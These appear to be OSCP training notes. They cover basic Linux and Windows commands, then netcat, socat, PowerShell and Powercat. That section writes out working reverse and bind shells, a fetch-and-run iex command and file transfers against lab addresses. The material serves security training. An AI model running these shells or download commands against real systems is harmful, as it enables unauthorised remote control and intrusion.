OSCP DAY1
Table of Contents
• Command Line Fun
• Practical Tools
BASIC LINUX & WINDOWS COMMANDS
Linux Commands
The Shell – Bash
The shell, or terminal, is a really useful tool. Bash is the standard shell on most Linux distros.
• Navigating
pwd - Print working directory
cd - Change directory
cd ~ - Change directory to your home directory
• Looking at files
ls - List files in directory
ls -ltr - Long listing (-l) sorted by modification time (-t), in reverse order (-r) so the most recently changed files appear last.
file - Show what type of file it is, for example whether it is a binary or a text file.
cat - Output the content of a file.
more - Output a file one screen at a time. less does the same job with more features, such as scrolling backwards.
• A little bit of everything
history - Show commands history
sudo -l - List which commands the current user is allowed to run with sudo.
The sudo configuration file is usually /etc/sudoers.
• Working with files
touch - Create a new file.
cp - Copy
mkdir - Make directory.
rm - Remove file
• Find
find is slower than locate but a lot more thorough: it walks the filesystem recursively and can match on names, regular expressions, owners, permissions, timestamps and many other attributes.
• Locate
locate is really fast because it relies on an internal database rather than walking the filesystem. That database is only as current as its last refresh, so you need to run updatedb (usually as root) before searching.
Then locate finds files by name almost instantly.
• Which
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
• filters
There are certain programs that are especially useful together with pipes. They can also be used as stand-alone programs, but you will most often see them in a pipeline.
sort
uniq
grep
head
tail
tr
• cut
Cut by column
cut selects one or more columns (fields) from every line of text.
Suppose we have a file of log lines and want to extract only the IP address from each one.
-d sets the delimiter that separates the fields, and -f selects which field(s) to keep.
• tr – Translate
Transform all letters into capital letters.
Remove a character (-d deletes every occurrence of the given characters):
cat file.txt | tr -d "."
• awk
awk is an advanced tool for processing text files. It is a programming language in its own right, so it can become quite complex. awk reads the whole file line by line and splits each line into fields ($1, $2, ...).
This is the basic structure of an awk command:
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
The search pattern is a regular expression.
You can leave out either the search portion or the action portion: with no action, every matching line is printed unchanged; with no pattern, the action runs on every line of the file.
Filtering for a specific IP address: use the address as the search pattern (escape the dots, since an unescaped "." matches any character).
To print only the fourth column of that file we could pipe the output to cut, but awk can do it directly in the action portion.
Use the -F flag to set a custom field delimiter (the default is whitespace).
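The cut, tr and awk pages above describe the commands without the sample text that was on the slides. The block below is an added example, not part of the original deck: it builds a small constructed log (four lines of "ip user method path status") inline and runs each filter over it, so the -d/-f, -d, pattern/action and -F points can be seen on real output.

```shell
#!/bin/sh
# Constructed sample log for the examples (not from the slides): "<ip> <user> <method> <path> <status>"
SAMPLE_LOG='10.11.0.22 alice GET /index.html 200
10.11.0.4 bob POST /login 302
10.11.0.22 alice GET /admin 403
192.168.1.10 carol GET /robots.txt 200'

# Constructed passwd-style lines, used to show a non-whitespace delimiter.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
kali:x:1000:1000:kali:/home/kali:/usr/bin/zsh'

# cut: -d sets the delimiter (a space), -f picks the field (field 1 = the IP address).
log_ips() {
  printf '%s\n' "$SAMPLE_LOG" | cut -d ' ' -f 1
}

# tr translates one character set into another: lower-case letters to upper-case.
upper() {
  printf '%s\n' "$1" | tr 'a-z' 'A-Z'
}

# tr -d deletes every occurrence of the listed characters, here the dots of an address.
strip_dots() {
  printf '%s\n' "$1" | tr -d '.'
}

# awk with only a search pattern prints matching lines unchanged.
# The dots are escaped and the pattern anchored at the line start, because an
# unescaped "10.11.0" would also match "10x11x0" and a bare 10.11.0.2 would match 10.11.0.22.
requests_from_subnet() {
  printf '%s\n' "$SAMPLE_LOG" | awk '/^10\.11\.0\./'
}

# awk with only an action runs it on every line: print the fifth column (the status code).
status_codes() {
  printf '%s\n' "$SAMPLE_LOG" | awk '{ print $5 }'
}

# Pattern and action together: lines whose first field equals the given host,
# printing only the fourth column (the requested path). Comparing $1 exactly
# avoids the regex pitfalls above; -v passes the shell argument into awk.
paths_for_host() {
  printf '%s\n' "$SAMPLE_LOG" | awk -v host="$1" '$1 == host { print $4 }'
}

# -F sets a custom field delimiter, here ':' for passwd-style lines: user and login shell.
shells() {
  printf '%s\n' "$SAMPLE_PASSWD" | awk -F ':' '{ print $1 "=" $7 }'
}

# Demonstration when run directly.
echo "IPs:";            log_ips
echo "Upper:";          upper 'try harder'
echo "No dots:";        strip_dots 10.11.0.22
echo "From 10.11.0.x:"; requests_from_subnet
echo "Status codes:";   status_codes
echo "Paths for 10.11.0.22:"; paths_for_host 10.11.0.22
echo "Shells:";         shells
```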
• Permissions
A long directory listing shows each file and directory together with its permission settings.
The first field is 10 characters long. The first character gives the type: d means it is a directory, - a regular file, l a symbolic link.
The remaining nine characters come in three groups of three: r for read, w for write and x for execute, with - where a permission is absent. The first group applies to the owner, the second to the group, and the last to all other users.
→ https://linuxjourney.com/lesson/file-permissions
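As an added example (not from the slides or the linked lesson), the functions below decode the 10-character mode field described above, convert each rwx group into its octal digit, and run the check a defender actually wants from a listing: which entries are writable by everyone. The ls -l lines used as input are constructed for the example.

```shell
#!/bin/sh
# Constructed ls -l output (not a real directory) used as sample input.
SAMPLE_LS='drwxr-xr-x 2 kali kali 4096 Jan  1 10:00 notes
-rw-rw-rw- 1 kali kali  120 Jan  1 10:01 shared.txt
-rwxr-x--- 1 root root 8192 Jan  1 10:02 backup.sh
lrwxrwxrwx 1 kali kali    9 Jan  1 10:03 link -> notes'

# Split the mode field into type, owner, group and other triples.
describe_mode() {
  mode=$1
  case "$(printf '%s' "$mode" | cut -c1)" in
    d) kind=directory ;;
    -) kind=file ;;
    l) kind=symlink ;;
    *) kind=other ;;
  esac
  owner=$(printf '%s' "$mode" | cut -c2-4)
  group=$(printf '%s' "$mode" | cut -c5-7)
  other=$(printf '%s' "$mode" | cut -c8-10)
  printf '%s owner=%s group=%s other=%s\n' "$kind" "$owner" "$group" "$other"
}

# Convert one rwx triple to its octal digit: r=4, w=2, x=1.
# s and t in the execute slot mean execute plus setuid/setgid/sticky; only the
# execute bit is counted here, the special bits are ignored for simplicity.
triple_to_octal() {
  n=0
  case "$1" in r??) n=$((n + 4)) ;; esac
  case "$1" in ?w?) n=$((n + 2)) ;; esac
  case "$1" in ??x|??s|??t) n=$((n + 1)) ;; esac
  printf '%d' "$n"
}

# Full mode string to three octal digits, e.g. drwxr-xr-x -> 755.
mode_to_octal() {
  printf '%s%s%s\n' \
    "$(triple_to_octal "$(printf '%s' "$1" | cut -c2-4)")" \
    "$(triple_to_octal "$(printf '%s' "$1" | cut -c5-7)")" \
    "$(triple_to_octal "$(printf '%s' "$1" | cut -c8-10)")"
}

# Names of entries that any user may write to: the 9th character of the mode is 'w'.
# Symlinks are skipped because their own mode is always rwxrwxrwx and says nothing
# about the target. Field 9 is the name (fields 6-8 are the date and time).
world_writable() {
  printf '%s\n' "$SAMPLE_LS" |
    awk 'substr($1, 9, 1) == "w" && substr($1, 1, 1) != "l" { print $9 }'
}

# Demonstration when run directly.
describe_mode drwxr-xr-x
mode_to_octal -rw-rw-rw-
echo "World-writable entries:"; world_writable
```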
Windows Commands
• Show hidden files
• Print out file content, like cat
• grep files
• Processes
List processes
tasklist
Kill a process
taskkill /PID 1532 /F
• Users
PRACTICAL TOOLS
Practical Tools
• Netcat
• Socat
• PowerShell and Powercat
• Tcpdump
Practical Tools - netcat
• netcat
Listening on TCP/UDP Port
Windows → nc.exe -nlvp 4444
Linux → nc -nlvp 4444
Netcat Bind Shell
Netcat reverse Shell
Practical Tools - netcat
• Transferring Files with Netcat
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
Practical Tools - socat
• Netcat vs Socat
First, let’s connect to a remote server on port 80 using both Netcat and socat:
kali@kali:~$ nc <remote server's ip address> 80
kali@kali:~$ socat - TCP4:<remote server's ip address>:80
kali@kali:~$ sudo nc -lvp localhost 443
kali@kali:~$ sudo socat TCP4-LISTEN:443 STDOUT
• Socat File Transfers
kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create
C:\Users\offsec> type received_secret_passwords.txt
"try harder!!!"
• Socat Reverse Shells
C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
kali@kali:~$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash
Practical Tools - PowerShell and Powercat
• Unrestricted
PS C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted
PS C:\WINDOWS\system32> Get-ExecutionPolicy
• PowerShell File Transfers
C:\Users\offsec> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
• PowerShell Reverse Shells
Using nc to set up a listener in order to receive a reverse shell
kali@kali:~$ sudo nc -lnvp 443
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
• PowerShell Bind Shells
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
kali@kali:~$ nc -nv 10.11.0.22 443
• Powercat
Powercat can be installed in Kali with apt install powercat, which will place the script in /usr/share/windows-resources/powercat.
Loading a remote PowerShell script using iex
PS C:\Users\Offsec> iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
• Powercat File Transfers
kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.ps1
PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
• Powercat Reverse Shells
kali@kali:~$ sudo nc -lvp 443
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
• Powercat Bind Shells
Using powercat to set up a bind shell
PS C:\Users\offsec> powercat -l -p 443 -e cmd.exe
Using nc to connect to a bind shell created by powercat
kali@kali:~$ nc 10.11.0.22 443
• Powercat Stand-Alone Payloads
Creating and executing a stand-alone payload
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
Receiving a stand-alone reverse shell
kali@kali:~$ sudo nc -lnvp 443
Executing a stand-alone payload using PowerShell
PS C:\Users\offsec> powershell.exe ./reverseshell.ps1
Practical Tools - Tcpdump
• tcpdump
Using tcpdump to write a packet capture to a file (-w) and read it back (-r)
kali@kali:~$ sudo tcpdump -i eth0 -w password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -r password_cracking_filtered.pcap
Using tcpdump to read and filter the packet capture
kali@kali:~$ sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort | uniq -c | head
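The pipeline above counts how often each value of the third field appears in tcpdump's text output. In tcpdump -n output that field is "source-ip.source-port", so it really counts connections, not hosts, and without a numeric sort the busiest entries are not at the top. The block below is an added example, not from the slides or the course pcap: it runs the same idea over a few constructed tcpdump -n lines (no capture file is needed), strips the port to count per host, and adds a SYN-only count, the view a defender uses to spot one host opening connections to many ports.

```shell
#!/bin/sh
# Constructed tcpdump -n -r style output (not a real capture). Field layout with default
# whitespace splitting: $1 time, $2 "IP", $3 src.port, $4 ">", $5 dst.port:, $6 "Flags", $7 "[S],"
SAMPLE_TCPDUMP='08:51:20.800917 IP 172.16.40.10.49160 > 172.16.40.1.81: Flags [S], seq 1, win 64240, length 0
08:51:20.801201 IP 172.16.40.1.81 > 172.16.40.10.49160: Flags [S.], seq 2, ack 2, win 65535, length 0
08:51:20.801330 IP 172.16.40.10.49160 > 172.16.40.1.81: Flags [.], ack 1, win 64240, length 0
08:51:20.812511 IP 172.16.40.10.49160 > 172.16.40.1.81: Flags [P.], seq 1:100, ack 1, win 64240, length 99
08:51:21.001000 IP 172.16.40.10.49162 > 172.16.40.1.81: Flags [S], seq 1, win 64240, length 0
08:51:22.120000 IP 10.11.0.22.40000 > 172.16.40.1.81: Flags [S], seq 1, win 64240, length 0'

# The slide's pipeline, with "sort -rn" added so the most frequent entry comes first.
# awk -F" " is the default separator, so -F is omitted here. $3 is "src-ip.src-port".
top_talkers_with_port() {
  printf '%s\n' "$SAMPLE_TCPDUMP" | awk '{ print $3 }' | sort | uniq -c | sort -rn | head
}

# Remove the trailing ".port" from $3 so the count is per source host.
top_source_hosts() {
  printf '%s\n' "$SAMPLE_TCPDUMP" |
    awk '{ sub(/\.[0-9]+$/, "", $3); print $3 }' | sort | uniq -c | sort -rn | head
}

# Segments with only SYN set ("Flags [S],") are new connection attempts. Many of them
# from one host towards many ports is what a port scan looks like in a capture.
syn_attempts_per_host() {
  printf '%s\n' "$SAMPLE_TCPDUMP" |
    awk '$6 == "Flags" && $7 == "[S]," { sub(/\.[0-9]+$/, "", $3); print $3 }' |
    sort | uniq -c | sort -rn
}

# Demonstration when run directly.
echo "Per connection:"; top_talkers_with_port
echo "Per host:";       top_source_hosts
echo "SYNs per host:";  syn_attempts_per_host
```

uniq -c pads the count with leading spaces, which is why the checks below normalise each line with awk before comparing.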
Using tcpdump filters
kali@kali:~$ sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
Using tcpdump to read the packet capture in hex/ASCII output
kali@kali:~$ sudo tcpdump -nX -r password_cracking_filtered.pcap
Using tcpdump with some advanced filtering
kali@kali:~$ sudo tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap
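The filter 'tcp[13] = 24' indexes byte 13 of the TCP header, which is the flags byte: FIN=1, SYN=2, RST=4, PSH=8, ACK=16, URG=32, ECE=64, CWR=128. 24 is PSH+ACK, i.e. segments that carry application data, which is why it pairs well with -A. The functions below are an added example, not from the slides: they translate between a flags byte and flag names and build the two filter forms, an exact match and a "bit is set" test, so the number in a filter can be checked rather than memorised.

```shell
#!/bin/sh
# Decode a TCP flags byte (tcp[13]) into flag names, lowest bit first.
tcp_flags() {
  v=$1
  out=""
  i=0
  for name in FIN SYN RST PSH ACK URG ECE CWR; do
    if [ $(( (v >> i) & 1 )) -eq 1 ]; then
      out="$out $name"
    fi
    i=$((i + 1))
  done
  printf '%s\n' "${out# }"
}

# Combine flag names into the byte value, e.g. "SYN ACK" -> 18.
flags_value() {
  total=0
  for f in "$@"; do
    case "$f" in
      FIN) bit=1 ;;  SYN) bit=2 ;;  RST) bit=4 ;;   PSH) bit=8 ;;
      ACK) bit=16 ;; URG) bit=32 ;; ECE) bit=64 ;;  CWR) bit=128 ;;
      *) echo "unknown flag: $f" >&2; return 1 ;;
    esac
    total=$((total | bit))
  done
  printf '%d\n' "$total"
}

# Exact-match filter: only segments with precisely these flags (the form used on the slide).
filter_exact() {
  printf "tcp[13] = %s\n" "$(flags_value "$@")"
}

# Bit-test filter: segments that have these flags set, whatever else is set alongside
# (e.g. every SYN, including SYN-ACK).
filter_any() {
  printf "tcp[13] & %s != 0\n" "$(flags_value "$@")"
}

# Demonstration when run directly.
echo "24 = $(tcp_flags 24)"
echo "SYN ACK = $(flags_value SYN ACK)"
filter_exact PSH ACK
filter_any SYN
```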
END